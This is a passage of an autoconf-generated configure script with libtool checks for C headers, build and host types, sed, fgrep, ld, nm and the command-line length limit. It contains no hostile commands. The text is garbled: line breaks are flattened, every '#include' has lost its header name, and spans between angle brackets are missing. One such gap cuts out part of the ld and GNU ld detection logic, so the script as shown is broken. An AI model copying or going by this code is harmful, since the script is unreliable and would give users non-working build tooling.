$ac_cv_path_EGREP" >&5 $as_echo "$ac_cv_path_EGREP" >&6; } EGREP="$ac_cv_path_EGREP" { $as_echo "$as_me:${as_lineno-$LINENO}: checking for ANSI C header files" >&5 $as_echo_n "checking for ANSI C header files... " >&6; } if ${ac_cv_header_stdc+:} false; then : $as_echo_n "(cached) " >&6 else cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include #include #include #include int main () { ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO"; then : ac_cv_header_stdc=yes else ac_cv_header_stdc=no fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext if test $ac_cv_header_stdc = yes; then # SunOS 4.x string.h does not declare mem*, contrary to ANSI. cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include _ACEOF if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | $EGREP "memchr" >/dev/null 2>&1; then : else ac_cv_header_stdc=no fi rm -f conftest* fi if test $ac_cv_header_stdc = yes; then # ISC 2.0.2 stdlib.h does not declare free, contrary to ANSI. cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include _ACEOF if (eval "$ac_cpp conftest.$ac_ext") 2>&5 | $EGREP "free" >/dev/null 2>&1; then : else ac_cv_header_stdc=no fi rm -f conftest* fi if test $ac_cv_header_stdc = yes; then # /bin/cc in Irix-4.0.5 gets non-ANSI ctype macros unless using -ansi. if test "$cross_compiling" = yes; then : : else cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include #include #if ((' ' & 0x0FF) == 0x020) # define ISLOWER(c) ('a' <= (c) && (c) <= 'z') # define TOUPPER(c) (ISLOWER(c) ? 'A' + ((c) - 'a') : (c)) #else # define ISLOWER(c) \ (('a' <= (c) && (c) <= 'i') \ || ('j' <= (c) && (c) <= 'r') \ || ('s' <= (c) && (c) <= 'z')) # define TOUPPER(c) (ISLOWER(c) ? ((c) | 0x40) : (c)) #endif #define XOR(e, f) (((e) && !(f)) || (!(e) && (f))) int main () { int i; for (i = 0; i < 256; i++) if (XOR (islower (i), ISLOWER (i)) || toupper (i) != TOUPPER (i)) return 2; return 0; } _ACEOF if ac_fn_c_try_run "$LINENO"; then : else ac_cv_header_stdc=no fi rm -f core *.core core.conftest.* gmon.out bb.out conftest$ac_exeext \ conftest.$ac_objext conftest.beam conftest.$ac_ext fi fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_header_stdc" >&5 $as_echo "$ac_cv_header_stdc" >&6; } if test $ac_cv_header_stdc = yes; then $as_echo "#define STDC_HEADERS 1" >>confdefs.h fi # On IRIX 5.3, sys/types and inttypes.h are conflicting. for ac_header in sys/types.h sys/stat.h stdlib.h string.h memory.h strings.h \ inttypes.h stdint.h unistd.h do : as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh` ac_fn_c_check_header_compile "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default " if eval test \"x\$"$as_ac_Header"\" = x"yes"; then : cat >>confdefs.h <<_ACEOF #define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1 _ACEOF fi done for ac_header in string do : ac_fn_c_check_header_mongrel "$LINENO" "string" "ac_cv_header_string" "$ac_includes_default" if test "x$ac_cv_header_string" = xyes; then : cat >>confdefs.h <<_ACEOF #define HAVE_STRING 1 _ACEOF fi done for ac_header in iostream do : ac_fn_c_check_header_mongrel "$LINENO" "iostream" "ac_cv_header_iostream" "$ac_includes_default" if test "x$ac_cv_header_iostream" = xyes; then : cat >>confdefs.h <<_ACEOF #define HAVE_IOSTREAM 1 _ACEOF fi done for ac_header in sys/utsname.h do : ac_fn_c_check_header_mongrel "$LINENO" "sys/utsname.h" "ac_cv_header_sys_utsname_h" "$ac_includes_default" if test "x$ac_cv_header_sys_utsname_h" = xyes; then : cat >>confdefs.h <<_ACEOF #define HAVE_SYS_UTSNAME_H 1 _ACEOF fi done # ?? case `pwd` in *\ * | *\ *) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: Libtool does not cope well with whitespace in \`pwd\`" >&5 $as_echo "$as_me: WARNING: Libtool does not cope well with whitespace in \`pwd\`" >&2;} ;; esac macro_version='2.4.6.42-b88ce' macro_revision='2.4.6.42' ltmain=$ac_aux_dir/ltmain.sh # Make sure we can run config.sub. $SHELL "$ac_aux_dir/config.sub" sun4 >/dev/null 2>&1 || as_fn_error $? "cannot run $SHELL $ac_aux_dir/config.sub" "$LINENO" 5 { $as_echo "$as_me:${as_lineno-$LINENO}: checking build system type" >&5 $as_echo_n "checking build system type... " >&6; } if ${ac_cv_build+:} false; then : $as_echo_n "(cached) " >&6 else ac_build_alias=$build_alias test "x$ac_build_alias" = x && ac_build_alias=`$SHELL "$ac_aux_dir/config.guess"` test "x$ac_build_alias" = x && as_fn_error $? "cannot guess build type; you must specify one" "$LINENO" 5 ac_cv_build=`$SHELL "$ac_aux_dir/config.sub" $ac_build_alias` || as_fn_error $? "$SHELL $ac_aux_dir/config.sub $ac_build_alias failed" "$LINENO" 5 fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_build" >&5 $as_echo "$ac_cv_build" >&6; } case $ac_cv_build in *-*-*) ;; *) as_fn_error $? "invalid value of canonical build" "$LINENO" 5;; esac build=$ac_cv_build ac_save_IFS=$IFS; IFS='-' set x $ac_cv_build shift build_cpu=$1 build_vendor=$2 shift; shift # Remember, the first character of IFS is used to create $*, # except with old shells: build_os=$* IFS=$ac_save_IFS case $build_os in *\ *) build_os=`echo "$build_os" | sed 's/ /-/g'`;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: checking host system type" >&5 $as_echo_n "checking host system type... " >&6; } if ${ac_cv_host+:} false; then : $as_echo_n "(cached) " >&6 else if test "x$host_alias" = x; then ac_cv_host=$ac_cv_build else ac_cv_host=`$SHELL "$ac_aux_dir/config.sub" $host_alias` || as_fn_error $? "$SHELL $ac_aux_dir/config.sub $host_alias failed" "$LINENO" 5 fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_host" >&5 $as_echo "$ac_cv_host" >&6; } case $ac_cv_host in *-*-*) ;; *) as_fn_error $? "invalid value of canonical host" "$LINENO" 5;; esac host=$ac_cv_host ac_save_IFS=$IFS; IFS='-' set x $ac_cv_host shift host_cpu=$1 host_vendor=$2 shift; shift # Remember, the first character of IFS is used to create $*, # except with old shells: host_os=$* IFS=$ac_save_IFS case $host_os in *\ *) host_os=`echo "$host_os" | sed 's/ /-/g'`;; esac # Backslashify metacharacters that are still active within # double-quoted strings. sed_quote_subst='s/\(["`$\\]\)/\\\1/g' # Same as above, but do not quote variable references. double_quote_subst='s/\(["`\\]\)/\\\1/g' # Sed substitution to delay expansion of an escaped shell variable in a # double_quote_subst'ed string. delay_variable_subst='s/\\\\\\\\\\\$/\\\\\\$/g' # Sed substitution to delay expansion of an escaped single quote. delay_single_quote_subst='s/'\''/'\'\\\\\\\'\''/g' # Sed substitution to avoid accidental globbing in evaled expressions no_glob_subst='s/\*/\\\*/g' ECHO='\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' ECHO=$ECHO$ECHO$ECHO$ECHO$ECHO ECHO=$ECHO$ECHO$ECHO$ECHO$ECHO$ECHO { $as_echo "$as_me:${as_lineno-$LINENO}: checking how to print strings" >&5 $as_echo_n "checking how to print strings... " >&6; } # Test print first, because it will be a builtin if present. if test "X`( print -r -- -n ) 2>/dev/null`" = X-n && \ test "X`print -r -- $ECHO 2>/dev/null`" = "X$ECHO"; then ECHO='print -r --' elif test "X`printf %s $ECHO 2>/dev/null`" = "X$ECHO"; then ECHO='printf %s\n' else # Use this function as a fallback that always works. func_fallback_echo () { eval 'cat <<_LTECHO_EOF $1 _LTECHO_EOF' } ECHO='func_fallback_echo' fi # func_echo_all arg... # Invoke $ECHO with all args, space-separated. func_echo_all () { $ECHO "" } case $ECHO in printf*) { $as_echo "$as_me:${as_lineno-$LINENO}: result: printf" >&5 $as_echo "printf" >&6; } ;; print*) { $as_echo "$as_me:${as_lineno-$LINENO}: result: print -r" >&5 $as_echo "print -r" >&6; } ;; *) { $as_echo "$as_me:${as_lineno-$LINENO}: result: cat" >&5 $as_echo "cat" >&6; } ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: checking for a sed that does not truncate output" >&5 $as_echo_n "checking for a sed that does not truncate output... " >&6; } if ${ac_cv_path_SED+:} false; then : $as_echo_n "(cached) " >&6 else ac_script=s/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb/ for ac_i in 1 2 3 4 5 6 7; do ac_script="$ac_script$as_nl$ac_script" done echo "$ac_script" 2>/dev/null | sed 99q >conftest.sed { ac_script=; unset ac_script;} if test -z "$SED"; then ac_path_SED_found=false # Loop through the user's path and test for each of PROGNAME-LIST as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_prog in sed gsed; do for ac_exec_ext in '' $ac_executable_extensions; do ac_path_SED="$as_dir/$ac_prog$ac_exec_ext" as_fn_executable_p "$ac_path_SED" || continue # Check for GNU ac_path_SED and select it if it is found. # Check for GNU $ac_path_SED case `"$ac_path_SED" --version 2>&1` in *GNU*) ac_cv_path_SED="$ac_path_SED" ac_path_SED_found=:;; *) ac_count=0 $as_echo_n 0123456789 >"conftest.in" while : do cat "conftest.in" "conftest.in" >"conftest.tmp" mv "conftest.tmp" "conftest.in" cp "conftest.in" "conftest.nl" $as_echo '' >> "conftest.nl" "$ac_path_SED" -f conftest.sed < "conftest.nl" >"conftest.out" 2>/dev/null || break diff "conftest.out" "conftest.nl" >/dev/null 2>&1 || break as_fn_arith $ac_count + 1 && ac_count=$as_val if test $ac_count -gt ${ac_path_SED_max-0}; then # Best one so far, save it but keep looking for a better one ac_cv_path_SED="$ac_path_SED" ac_path_SED_max=$ac_count fi # 10*(2^10) chars as input seems more than enough test $ac_count -gt 10 && break done rm -f conftest.in conftest.tmp conftest.nl conftest.out;; esac $ac_path_SED_found && break 3 done done done IFS=$as_save_IFS if test -z "$ac_cv_path_SED"; then as_fn_error $? "no acceptable sed could be found in \$PATH" "$LINENO" 5 fi else ac_cv_path_SED=$SED fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_path_SED" >&5 $as_echo "$ac_cv_path_SED" >&6; } SED="$ac_cv_path_SED" rm -f conftest.sed test -z "$SED" && SED=sed Xsed="$SED -e 1s/^X//" { $as_echo "$as_me:${as_lineno-$LINENO}: checking for fgrep" >&5 $as_echo_n "checking for fgrep... " >&6; } if ${ac_cv_path_FGREP+:} false; then : $as_echo_n "(cached) " >&6 else if echo 'ab*c' | $GREP -F 'ab*c' >/dev/null 2>&1 then ac_cv_path_FGREP="$GREP -F" else if test -z "$FGREP"; then ac_path_FGREP_found=false # Loop through the user's path and test for each of PROGNAME-LIST as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH$PATH_SEPARATOR/usr/xpg4/bin do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_prog in fgrep; do for ac_exec_ext in '' $ac_executable_extensions; do ac_path_FGREP="$as_dir/$ac_prog$ac_exec_ext" as_fn_executable_p "$ac_path_FGREP" || continue # Check for GNU ac_path_FGREP and select it if it is found. # Check for GNU $ac_path_FGREP case `"$ac_path_FGREP" --version 2>&1` in *GNU*) ac_cv_path_FGREP="$ac_path_FGREP" ac_path_FGREP_found=:;; *) ac_count=0 $as_echo_n 0123456789 >"conftest.in" while : do cat "conftest.in" "conftest.in" >"conftest.tmp" mv "conftest.tmp" "conftest.in" cp "conftest.in" "conftest.nl" $as_echo 'FGREP' >> "conftest.nl" "$ac_path_FGREP" FGREP < "conftest.nl" >"conftest.out" 2>/dev/null || break diff "conftest.out" "conftest.nl" >/dev/null 2>&1 || break as_fn_arith $ac_count + 1 && ac_count=$as_val if test $ac_count -gt ${ac_path_FGREP_max-0}; then # Best one so far, save it but keep looking for a better one ac_cv_path_FGREP="$ac_path_FGREP" ac_path_FGREP_max=$ac_count fi # 10*(2^10) chars as input seems more than enough test $ac_count -gt 10 && break done rm -f conftest.in conftest.tmp conftest.nl conftest.out;; esac $ac_path_FGREP_found && break 3 done done done IFS=$as_save_IFS if test -z "$ac_cv_path_FGREP"; then as_fn_error $? "no acceptable fgrep could be found in $PATH$PATH_SEPARATOR/usr/xpg4/bin" "$LINENO" 5 fi else ac_cv_path_FGREP=$FGREP fi fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_path_FGREP" >&5 $as_echo "$ac_cv_path_FGREP" >&6; } FGREP="$ac_cv_path_FGREP" test -z "$GREP" && GREP=grep # Check whether --with-gnu-ld was given. if test "${with_gnu_ld+set}" = set; then : withval=$with_gnu_ld; test no = "$withval" || with_gnu_ld=yes else with_gnu_ld=no fi ac_prog=ld if test yes = "$GCC"; then # Check if gcc -print-prog-name=ld gives a path. { $as_echo "$as_me:${as_lineno-$LINENO}: checking for ld used by $CC" >&5 $as_echo_n "checking for ld used by $CC... " >&6; } case $host in *-*-mingw*) # gcc leaves a trailing carriage return, which upsets mingw ac_prog=`($CC -print-prog-name=ld) 2>&5 | tr -d '\015'` ;; *) ac_prog=`($CC -print-prog-name=ld) 2>&5` ;; esac case $ac_prog in # Accept absolute paths. [\\/]* | ?:[\\/]*) re_direlt='/[^/][^/]*/\.\./' # Canonicalize the pathname of ld ac_prog=`$ECHO "$ac_prog"| $SED 's%\\\\%/%g'` while $ECHO "$ac_prog" | $GREP "$re_direlt" > /dev/null 2>&1; do ac_prog=`$ECHO $ac_prog| $SED "s%$re_direlt%/%"` done test -z "$LD" && LD=$ac_prog ;; "") # If it fails, then pretend we aren't using GCC. ac_prog=ld ;; *) # If it is relative, then search for the first ld in PATH. with_gnu_ld=unknown ;; esac elif test yes = "$with_gnu_ld"; then { $as_echo "$as_me:${as_lineno-$LINENO}: checking for GNU ld" >&5 $as_echo_n "checking for GNU ld... " >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: checking for non-GNU ld" >&5 $as_echo_n "checking for non-GNU ld... " >&6; } fi if ${lt_cv_path_LD+:} false; then : $as_echo_n "(cached) " >&6 else if test -z "$LD"; then lt_save_ifs=$IFS; IFS=$PATH_SEPARATOR for ac_dir in $PATH; do IFS=$lt_save_ifs test -z "$ac_dir" && ac_dir=. if test -f "$ac_dir/$ac_prog" || test -f "$ac_dir/$ac_prog$ac_exeext"; then lt_cv_path_LD=$ac_dir/$ac_prog # Check to see if the program is GNU ld. I'd rather use --version, # but apparently some variants of GNU ld only accept -v. # Break only if it was the GNU/non-GNU ld that we prefer. case `"$lt_cv_path_LD" -v 2>&1 &5 $as_echo "$LD" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test -z "$LD" && as_fn_error $? "no acceptable ld found in \$PATH" "$LINENO" 5 { $as_echo "$as_me:${as_lineno-$LINENO}: checking if the linker ($LD) is GNU ld" >&5 $as_echo_n "checking if the linker ($LD) is GNU ld... " >&6; } if ${lt_cv_prog_gnu_ld+:} false; then : $as_echo_n "(cached) " >&6 else # I'd rather use --version here, but apparently some GNU lds only accept -v. case `$LD -v 2>&1 &5 $as_echo "$lt_cv_prog_gnu_ld" >&6; } with_gnu_ld=$lt_cv_prog_gnu_ld { $as_echo "$as_me:${as_lineno-$LINENO}: checking for BSD- or MS-compatible name lister (nm)" >&5 $as_echo_n "checking for BSD- or MS-compatible name lister (nm)... " >&6; } if ${lt_cv_path_NM+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$NM"; then # Let the user override the test. lt_cv_path_NM=$NM else lt_nm_to_check=${ac_tool_prefix}nm if test -n "$ac_tool_prefix" && test "$build" = "$host"; then lt_nm_to_check="$lt_nm_to_check nm" fi for lt_tmp_nm in $lt_nm_to_check; do lt_save_ifs=$IFS; IFS=$PATH_SEPARATOR for ac_dir in $PATH /usr/ccs/bin/elf /usr/ccs/bin /usr/ucb /bin; do IFS=$lt_save_ifs test -z "$ac_dir" && ac_dir=. tmp_nm=$ac_dir/$lt_tmp_nm if test -f "$tmp_nm" || test -f "$tmp_nm$ac_exeext"; then # Check to see if the nm accepts a BSD-compat flag. # Adding the 'sed 1q' prevents false positives on HP-UX, which says: # nm: unknown option "B" ignored # Tru64's nm complains that /dev/null is an invalid object file # MSYS converts /dev/null to NUL, MinGW nm treats NUL as empty case $build_os in mingw*) lt_bad_file=conftest.nm/nofile ;; *) lt_bad_file=/dev/null ;; esac case `"$tmp_nm" -B $lt_bad_file 2>&1 | sed '1q'` in *$lt_bad_file* | *'Invalid file or object type'*) lt_cv_path_NM="$tmp_nm -B" break 2 ;; *) case `"$tmp_nm" -p /dev/null 2>&1 | sed '1q'` in */dev/null*) lt_cv_path_NM="$tmp_nm -p" break 2 ;; *) lt_cv_path_NM=${lt_cv_path_NM="$tmp_nm"} # keep the first match, but continue # so that we can try to find one that supports BSD flags ;; esac ;; esac fi done IFS=$lt_save_ifs done : ${lt_cv_path_NM=no} fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_path_NM" >&5 $as_echo "$lt_cv_path_NM" >&6; } if test no != "$lt_cv_path_NM"; then NM=$lt_cv_path_NM else # Didn't find any BSD compatible name lister, look for dumpbin. if test -n "$DUMPBIN"; then : # Let the user override the test. else if test -n "$ac_tool_prefix"; then for ac_prog in dumpbin "link -dump" do # Extract the first word of "$ac_tool_prefix$ac_prog", so it can be a program name with args. set dummy $ac_tool_prefix$ac_prog; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_DUMPBIN+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$DUMPBIN"; then ac_cv_prog_DUMPBIN="$DUMPBIN" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_DUMPBIN="$ac_tool_prefix$ac_prog" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi DUMPBIN=$ac_cv_prog_DUMPBIN if test -n "$DUMPBIN"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $DUMPBIN" >&5 $as_echo "$DUMPBIN" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test -n "$DUMPBIN" && break done fi if test -z "$DUMPBIN"; then ac_ct_DUMPBIN=$DUMPBIN for ac_prog in dumpbin "link -dump" do # Extract the first word of "$ac_prog", so it can be a program name with args. set dummy $ac_prog; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_DUMPBIN+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_DUMPBIN"; then ac_cv_prog_ac_ct_DUMPBIN="$ac_ct_DUMPBIN" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_DUMPBIN="$ac_prog" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_DUMPBIN=$ac_cv_prog_ac_ct_DUMPBIN if test -n "$ac_ct_DUMPBIN"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_DUMPBIN" >&5 $as_echo "$ac_ct_DUMPBIN" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test -n "$ac_ct_DUMPBIN" && break done if test "x$ac_ct_DUMPBIN" = x; then DUMPBIN=":" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac DUMPBIN=$ac_ct_DUMPBIN fi fi case `$DUMPBIN -symbols -headers /dev/null 2>&1 | sed '1q'` in *COFF*) DUMPBIN="$DUMPBIN -symbols -headers" ;; *) DUMPBIN=: ;; esac fi if test : != "$DUMPBIN"; then NM=$DUMPBIN fi fi test -z "$NM" && NM=nm { $as_echo "$as_me:${as_lineno-$LINENO}: checking the name lister ($NM) interface" >&5 $as_echo_n "checking the name lister ($NM) interface... " >&6; } if ${lt_cv_nm_interface+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_nm_interface="BSD nm" echo "int some_variable = 0;" > conftest.$ac_ext (eval echo "\"\$as_me:$LINENO: $ac_compile\"" >&5) (eval "$ac_compile" 2>conftest.err) cat conftest.err >&5 (eval echo "\"\$as_me:$LINENO: $NM \\\"conftest.$ac_objext\\\"\"" >&5) (eval "$NM \"conftest.$ac_objext\"" 2>conftest.err > conftest.out) cat conftest.err >&5 (eval echo "\"\$as_me:$LINENO: output\"" >&5) cat conftest.out >&5 if $GREP 'External.*some_variable' conftest.out > /dev/null; then lt_cv_nm_interface="MS dumpbin" fi rm -f conftest* fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_nm_interface" >&5 $as_echo "$lt_cv_nm_interface" >&6; } { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether ln -s works" >&5 $as_echo_n "checking whether ln -s works... " >&6; } LN_S=$as_ln_s if test "$LN_S" = "ln -s"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 $as_echo "yes" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no, using $LN_S" >&5 $as_echo "no, using $LN_S" >&6; } fi # find the maximum length of command line arguments { $as_echo "$as_me:${as_lineno-$LINENO}: checking the maximum length of command line arguments" >&5 $as_echo_n "checking the maximum length of command line arguments... " >&6; } if ${lt_cv_sys_max_cmd_len+:} false; then : $as_echo_n "(cached) " >&6 else i=0 teststring=ABCD case $build_os in msdosdjgpp*) # On DJGPP, this test can blow up pretty badly due to problems in libc # (any single argument exceeding 2000 bytes causes a buffer overrun # during glob expansion). Even if it were fixed, the result of this # check would be larger than it should be. lt_cv_sys_max_cmd_len=12288; # 12K is about right ;; gnu*) # Under GNU Hurd, this test is not required because there is # no limit to the length of command line arguments. # Libtool will interpret -1 as no limit whatsoever lt_cv_sys_max_cmd_len=-1; ;; cygwin* | mingw* | cegcc*) # On Win9x/ME, this test blows up -- it succeeds, but takes # about 5 minutes as the teststring grows exponentially. # Worse, since 9x/ME are not pre-emptively multitasking, # you end up with a "frozen" computer, even though with patience # the test eventually succeeds (with a max line length of 256k). # Instead, let's just punt: use the minimum linelength reported by # all of the supported platforms: 8192 (on NT/2K/XP). lt_cv_sys_max_cmd_len=8192; ;; mint*) # On MiNT this can take a long time and run out of memory. lt_cv_sys_max_cmd_len=8192; ;; amigaos*) # On AmigaOS with pdksh, this test takes hours, literally. # So we just punt and use a minimum line length of 8192. lt_cv_sys_max_cmd_len=8192; ;; bitrig* | darwin* | dragonfly* | freebsd* | netbsd* | openbsd*) # This has been around since 386BSD, at least. Likely further. if test -x /sbin/sysctl; then lt_cv_sys_max_cmd_len=`/sbin/sysctl -n kern.argmax` elif test -x /usr/sbin/sysctl; then lt_cv_sys_max_cmd_len=`/usr/sbin/sysctl -n kern.argmax` else lt_cv_sys_max_cmd_len=65536 # usable default for all BSDs fi # And add a safety zone lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \/ 4` lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \* 3` ;; interix*) # We know the value 262144 and hardcode it with a safety zone (like BSD) lt_cv_sys_max_cmd_len=196608 ;; os2*) # The test takes a long time on OS/2. lt_cv_sys_max_cmd_len=8192 ;; osf*) # Dr. Hans Ekkehard Plesser reports seeing a kernel panic running configure # due to this test when exec_disable_arg_limit is 1 on Tru64. It is not # nice to cause kernel panics so lets avoid the loop below. # First set a reasonable default. lt_cv_sys_max_cmd_len=16384 # if test -x /sbin/sysconfig; then case `/sbin/sysconfig -q proc exec_disable_arg_limit` in *1*) lt_cv_sys_max_cmd_len=-1 ;; esac fi ;; sco3.2v5*) lt_cv_sys_max_cmd_len=102400 ;; sysv5* | sco5v6* | sysv4.2uw2*) kargmax=`grep ARG_MAX /etc/conf/cf.d/stune 2>/dev/null` if test -n "$kargmax"; then lt_cv_sys_max_cmd_len=`echo $kargmax | sed 's/.*[ ]//'` else lt_cv_sys_max_cmd_len=32768 fi ;; *) lt_cv_sys_max_cmd_len=`(getconf ARG_MAX) 2> /dev/null` if test -n "$lt_cv_sys_max_cmd_len" && \ test undefined != "$lt_cv_sys_max_cmd_len"; then lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \/ 4` lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \* 3` else # Make teststring a little bigger before we do anything with it. # a 1K string should be a reasonable start. for i in 1 2 3 4 5 6 7 8; do teststring=$teststring$teststring done SHELL=${SHELL-${CONFIG_SHELL-/bin/sh}} # If test is not a shell built-in, we'll probably end up computing a # maximum length that is only half of the actual maximum length, but # we can't tell. while { test X`env echo "$teststring$teststring" 2>/dev/null` \ = "X$teststring$teststring"; } >/dev/null 2>&1 && test 17 != "$i" # 1/2 MB should be enough do i=`expr $i + 1` teststring=$teststring$teststring done # Only check the string length outside the loop. lt_cv_sys_max_cmd_len=`expr "X$teststring" : ".*" 2>&1` teststring= # Add a significant safety factor because C++ compilers can tack on # massive amounts of additional arguments before passing them to the # linker. It appears as though 1/2 is a usable value. lt_cv_sys_max_cmd_len=`expr $lt_cv_sys_max_cmd_len \/ 2` fi ;; esac fi if test -n "$lt_cv_sys_max_cmd_len"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_sys_max_cmd_len" >&5 $as_echo "$lt_cv_sys_max_cmd_len" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: none" >&5 $as_echo "none" >&6; } fi max_cmd_len=$lt_cv_sys_max_cmd_len : ${CP="cp -f"} : ${MV="mv -f"} : ${RM="rm -f"} if ( (MAIL=60; unset MAIL) || exit) >/dev/null 2>&1; then lt_unset=unset else lt_unset=false fi # test EBCDIC or ASCII case `echo X|tr X '\101'` in A) # ASCII based system # \n is not interpreted correctly by Solaris 8 /usr/ucb/tr lt_SP2NL='tr \040 \012' lt_NL2SP='tr \015\012 \040\040' ;; *) # EBCDIC based system lt_SP2NL='tr \100 \n' lt_NL2SP='tr \r\n \100\100' ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: checking how to convert $build file names to $host format" >&5 $as_echo_n "checking how to convert $build file names to $host format... " >&6; } if ${lt_cv_to_host_file_cmd+:} false; then : $as_echo_n "(cached) " >&6 else case $host in *-*-mingw* ) case $build in *-*-mingw* ) # actually msys lt_cv_to_host_file_cmd=func_convert_file_msys_to_w32 ;; *-*-cygwin* ) lt_cv_to_host_file_cmd=func_convert_file_cygwin_to_w32 ;; * ) # otherwise, assume *nix lt_cv_to_host_file_cmd=func_convert_file_nix_to_w32 ;; esac ;; *-*-cygwin* ) case $build in *-*-mingw* ) # actually msys lt_cv_to_host_file_cmd=func_convert_file_msys_to_cygwin ;; *-*-cygwin* ) lt_cv_to_host_file_cmd=func_convert_file_noop ;; * ) # otherwise, assume *nix lt_cv_to_host_file_cmd=func_convert_file_nix_to_cygwin ;; esac ;; * ) # unhandled hosts (and "normal" native builds) lt_cv_to_host_file_cmd=func_convert_file_noop ;; esac fi to_host_file_cmd=$lt_cv_to_host_file_cmd { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_to_host_file_cmd" >&5 $as_echo "$lt_cv_to_host_file_cmd" >&6; } { $as_echo "$as_me:${as_lineno-$LINENO}: checking how to convert $build file names to toolchain format" >&5 $as_echo_n "checking how to convert $build file names to toolchain format... " >&6; } if ${lt_cv_to_tool_file_cmd+:} false; then : $as_echo_n "(cached) " >&6 else #assume ordinary cross tools, or native build. lt_cv_to_tool_file_cmd=func_convert_file_noop case $host in *-*-mingw* ) case $build in *-*-mingw* ) # actually msys lt_cv_to_tool_file_cmd=func_convert_file_msys_to_w32 ;; esac ;; esac fi to_tool_file_cmd=$lt_cv_to_tool_file_cmd { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_to_tool_file_cmd" >&5 $as_echo "$lt_cv_to_tool_file_cmd" >&6; } { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $LD option to reload object files" >&5 $as_echo_n "checking for $LD option to reload object files... " >&6; } if ${lt_cv_ld_reload_flag+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_ld_reload_flag='-r' fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_ld_reload_flag" >&5 $as_echo "$lt_cv_ld_reload_flag" >&6; } reload_flag=$lt_cv_ld_reload_flag case $reload_flag in "" | " "*) ;; *) reload_flag=" $reload_flag" ;; esac reload_cmds='$LD$reload_flag -o $output$reload_objs' case $host_os in cygwin* | mingw* | pw32* | 